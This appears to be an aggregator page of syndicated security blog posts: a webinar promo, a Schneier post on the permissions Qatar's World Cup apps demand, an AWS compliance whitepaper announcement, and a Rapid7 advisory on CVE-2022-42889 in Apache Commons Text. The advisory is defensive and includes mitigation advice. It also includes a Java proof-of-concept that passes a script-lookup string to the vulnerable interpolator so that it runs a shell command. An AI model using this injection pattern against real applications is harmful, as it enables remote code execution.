Encouraging knowledge sharing is a great way to help address the skills gap. The more we share our experiences, the easier it is to improve processes and procedures to reduce the risk of mistakes reoccurring. But how do you make sure you get it right?

Join Alex Noble, cloud security lead, and Jason Hart, chief technology officer EMEA, for our Lunch and Learn Series: Stay ahead of the curve. During these exclusive, interactive virtual sessions, we will explore emerging best practices driven by new technologies and evolving business models. Don’t miss your chance to connect with local peers and team members over a complimentary virtual lunch.

Join the conversation and save your seat.

Qatar Spyware

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/10/qatar-spyware.html

Everyone visiting Qatar for the World Cup needs to install spyware on their phone.

Everyone travelling to Qatar during the football World Cup will be asked to download two apps called Ehteraz and Hayya.

Briefly, Ehteraz is a covid-19 tracking app, while Hayya is an official World Cup app used to keep track of match tickets and to access the free Metro in Qatar.

In particular, the covid-19 app Ehteraz asks for access to several rights on your mobile, like access to read, delete or change all content on the phone, as well as access to connect to WiFi and Bluetooth, override other apps and prevent the phone from going into sleep mode.

The Ehteraz app, which everyone over 18 coming to Qatar must download, also gets a number of other accesses such as an overview of your exact location, the ability to make direct calls via your phone and the ability to disable your screen lock.

The Hayya app does not ask for as much, but also has a number of critical aspects. Among other things, the app asks for access to share your personal information with almost no restrictions. In addition, the Hayya app provides access to determine the phone’s exact location, prevent the device from going into sleep mode, and view the phone’s network connections.

Despite what the article says, I don’t know how mandatory this actually is. I know people who visited Saudi Arabia when that country had a similarly sketchy app requirement. Some of them just didn’t bother downloading the apps, and were never asked about it at the border.

New AWS whitepaper: Using AWS in the Context of Canada’s Controlled Goods Program (CGP)

Post Syndicated from Michael Davie original https://aws.amazon.com/blogs/security/new-aws-whitepaper-using-aws-in-the-context-of-canadas-controlled-goods-program-cgp/

Amazon Web Services (AWS) has released a new whitepaper to help Canadian defense and security customers accelerate their use of the AWS Cloud.

The new guide, Using AWS in the Context of Canada’s Controlled Goods Program (CGP), continues our efforts to help AWS customers navigate the regulatory expectations of the Government of Canada’s Controlled Goods Program in a shared responsibility environment.

This whitepaper is intended for customers that are looking to store and process controlled goods information in the AWS Cloud, and is particularly useful for leadership, security, risk, and compliance teams that need to understand CGP requirements and guidance.

The whitepaper summarizes CGP requirements and guidance related to the protection of controlled goods information, and gives CGP-regulated customers information they can use to commence their due diligence and assess how to implement the appropriate programs for their use of AWS Cloud services.

This document is our first that is specific to Canadian regulatory requirements and joins other guides related to specific regulatory regimes around the world. As the regulatory environment continues to evolve, we’ll provide further updates on the AWS Security Blog and the AWS Compliance page. You can find more information on cloud-related regulatory compliance at the AWS Compliance Center. You can also reach out to your AWS account manager for help finding the resources you need.

 

Michael Davie

Michael is a Senior Industry Specialist with AWS Security Assurance. He works with our customers, their regulators, and AWS teams to help raise the bar on secure cloud adoption and usage. Michael has over 20 years of experience working in the defence, intelligence, and technology sectors in Canada and is a licensed professional engineer.

CVE-2022-42889: Keep Calm and Stop Saying “4Shell”

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/

CVE-2022-42889, which some have begun calling “Text4Shell,” is a vulnerability in the popular Apache Commons Text library that can result in code execution when processing malicious input. The vulnerability was announced on October 13, 2022 on the Apache dev list. CVE-2022-42889 arises from insecure implementation of Commons Text’s variable interpolation functionality—more specifically, some default lookup strings could potentially accept untrusted input from remote attackers, such as DNS requests, URLs, or inline scripts.

CVE-2022-42889 affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10.

The vulnerability has been compared to Log4Shell since it is an open-source library-level vulnerability that is likely to impact a wide variety of software applications that use the relevant object. However, initial analysis indicates that this is a bad comparison. The nature of the vulnerability means that unlike Log4Shell, it will be rare that an application uses the vulnerable component of Commons Text to process untrusted, potentially malicious input. Additionally, JDK version matters for exploitability. Our team tested a proof-of-concept exploit across the following JDK versions:

  • JDK 1.8.0_341 – PoC works
  • JDK 9.0.4 – PoC works
  • JDK 10.0.2 – PoC works
  • JDK 11.0.16.1 – warning but works
  • JDK 12.0.2 – warning but works
  • JDK 13.0.2 – warning but works
  • JDK 14.0.2 – warning but works
  • JDK 15.0.2 – fails
  • JDK 16.0.2 – fails
  • JDK 17.0.4.1 – fails
  • JDK 18.0.2.1 – fails
  • JDK 19 – fails

Results were identical for OpenJDK.

In summary, much like with Spring4Shell, there are significant caveats to practical exploitability for CVE-2022-42889. With that said, we still recommend patching any relevant impacted software according to your normal, hair-not-on-fire patch cycle.

Technical analysis

The vulnerability exists in the StringSubstitutor interpolator object. An interpolator is created by the StringSubstitutor.createInterpolator() method and will allow for string lookups as defined in the StringLookupFactory. This can be used by passing a string “${prefix:name}” where the prefix is the aforementioned lookup. Using the “script”, “dns”, or “url” lookups would allow a crafted string to execute arbitrary scripts when passed to the interpolator object.

Since Commons Text is a library, the specific usage of the interpolator will dictate the impact of this vulnerability. As a toy proof of concept, consider:

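The original post shows the proof of concept as an image. The snippet below is a minimal sketch of that kind of PoC, assuming a vulnerable Commons Text version (1.5 through 1.9) on a pre-15 JDK; the class name and the command in the payload are illustrative, not the original code:

import org.apache.commons.text.StringSubstitutor;

public class CommonsTextPoc {
    public static void main(String[] args) {
        // createInterpolator() enables the default lookups, including "script",
        // on the vulnerable Commons Text versions.
        StringSubstitutor interpolator = StringSubstitutor.createInterpolator();

        // In a real application this value would be attacker-controlled.
        String pocstring =
            "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/poc')}";

        // Resolving the "script" lookup evaluates the embedded JavaScript,
        // which here spawns a process.
        System.out.println(interpolator.replace(pocstring));
    }
}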

While this specific code fragment is unlikely to exist in production applications, the concern is that in some applications, the `pocstring` variable may be attacker-controlled. In this sense, the vulnerability echoes Log4Shell. However, the StringSubstitutor interpolator is considerably less widely used than the vulnerable string substitution in Log4j and the nature of such an interpolator means that getting crafted input to the vulnerable object is less likely than merely interacting with such a crafted string as in Log4Shell.

Mitigation guidance

Organizations that have direct dependencies on Apache Commons Text should upgrade to the fixed version (1.10.0). As with most library vulnerabilities, we will see the usual tail of follow-on vendor advisories with upgrades for products that package vulnerable implementations of the library. We recommend that you install these patches as they become available, and prioritize any for which the vendor indicates that their implementation may be remotely exploitable.
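
For applications that only need plain key/value substitution, one additional defensive pattern is to avoid the interpolator entirely and use a map-backed StringSubstitutor, so that prefixes such as script, dns, and url are never resolved. A minimal sketch of that pattern (the map contents and variable names are illustrative):

import java.util.Map;
import org.apache.commons.text.StringSubstitutor;

public class SafeSubstitution {
    public static void main(String[] args) {
        // A map-backed substitutor only resolves the keys you supply; it does not
        // perform script, dns, or url lookups even if the input contains them.
        Map<String, String> values = Map.of("user", "alice");
        StringSubstitutor substitutor = new StringSubstitutor(values);

        String untrusted = "${script:javascript:1+1} welcome, ${user}";
        // "script:javascript:1+1" is not a key in the map, so it is left as-is,
        // while ${user} resolves to "alice".
        System.out.println(substitutor.replace(untrusted));
    }
}

This does not replace upgrading to 1.10.0, but it limits exposure if a vulnerable version lingers as a transitive dependency.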

Rapid7 customers

Our engineering team is evaluating the feasibility of a vulnerability check.
